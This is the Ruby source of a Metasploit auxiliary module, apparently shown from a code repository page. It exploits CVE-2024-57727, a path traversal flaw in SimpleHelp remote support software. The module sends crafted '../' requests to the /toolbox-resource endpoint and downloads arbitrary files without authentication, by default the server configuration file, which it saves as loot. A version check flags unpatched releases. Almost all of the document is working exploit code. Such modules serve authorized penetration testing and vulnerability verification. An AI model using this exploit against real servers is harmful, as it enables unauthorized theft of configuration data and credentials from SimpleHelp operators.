Jack Heysel
110 lines
3.7 KiB
Ruby
110 lines
3.7 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
|
|
include Msf::Auxiliary::Report
|
|
include Msf::Auxiliary::Scanner
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
prepend Msf::Exploit::Remote::AutoCheck
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'SimpleHelp Path Traversal Vulnerability CVE-2024-57727',
|
|
'Description' => %q{
|
|
There exists a path traversal vulnerability in the /toolbox-resource endpoint that enables unauthenticated
|
|
remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests
|
|
},
|
|
'Author' => [
|
|
'horizon3ai', # discovery
|
|
'imjdl', # CVE-2024-57727 PoC
|
|
'jheysel-r7' # module
|
|
],
|
|
'References' => [
|
|
[ 'URL', 'https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/'], # Discovery
|
|
[ 'URL', 'https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier'], # Vendor Advisory
|
|
[ 'URL', 'https://rustlang.rs/posts/simple-help/'], # PoC for Path Traversal CVE-2024-57727
|
|
[ 'URL', 'https://attackerkb.com/topics/G4CTOrbDx0/cve-2024-57727'], # PoC for Path Traversal CVE-2024-57727
|
|
[ 'CVE', '2024-57727'],
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'DisclosureDate' => '2025-01-12',
|
|
'Notes' => {
|
|
'Stability' => [ CRASH_SAFE, ],
|
|
'SideEffects' => [ IOC_IN_LOGS, ],
|
|
'Reliability' => [ ]
|
|
}
|
|
)
|
|
)
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [true, 'The base path to SimpleHelp installation', '/']),
|
|
OptString.new('FILEPATH', [true, 'The path to the file to read', 'configuration/serverconfig.xml']),
|
|
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 2 ])
|
|
]
|
|
)
|
|
end
|
|
|
|
def check
|
|
res = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path, 'allversions')
|
|
)
|
|
|
|
return Exploit::CheckCode::Unknown('Unable to retrieve SimpleHelp version.') unless res&.body =~ /Visual Version:\s*(\d+\.\d+(?:\.\d+))/
|
|
|
|
version = Rex::Version.new(Regexp.last_match(1))
|
|
|
|
# Patched versions are: 5.5.8 or 5.4.10 or 5.3.9
|
|
if version.between?(Rex::Version.new('5.5.0'), Rex::Version.new('5.5.7')) ||
|
|
version.between?(Rex::Version.new('5.4.0'), Rex::Version.new('5.4.9')) ||
|
|
version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('5.3.8'))
|
|
return Exploit::CheckCode::Appears("Version detected: #{version}")
|
|
end
|
|
|
|
Exploit::CheckCode::Safe("Version detected: #{version}")
|
|
end
|
|
|
|
def run_host(ip)
|
|
directory = %w[alertsdb invitations secmsg toolbox-resources backups sslconfig translations notifications techprefs history recordings templates html remotework toolbox].sample
|
|
traverse = '../' * datastore['DEPTH']
|
|
|
|
res = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path, "/toolbox-resource/../#{directory}/#{traverse}/#{datastore['FILEPATH']}")
|
|
)
|
|
|
|
unless res&.code == 200 && res.body.present?
|
|
print_error('Nothing was downloaded')
|
|
return
|
|
end
|
|
|
|
vprint_line(res.body)
|
|
print_good("Downloaded #{res.body.length} bytes")
|
|
|
|
report_vuln(
|
|
host: rhost,
|
|
port: rport,
|
|
proto: 'tcp',
|
|
name: name,
|
|
info: 'Module triggered a 200 reply',
|
|
refs: references
|
|
)
|
|
|
|
path = store_loot(
|
|
'simplehelp.traversal',
|
|
'text/plain',
|
|
ip,
|
|
res.body,
|
|
datastore['FILEPATH']
|
|
)
|
|
print_good("File saved in: #{path}")
|
|
end
|
|
end
|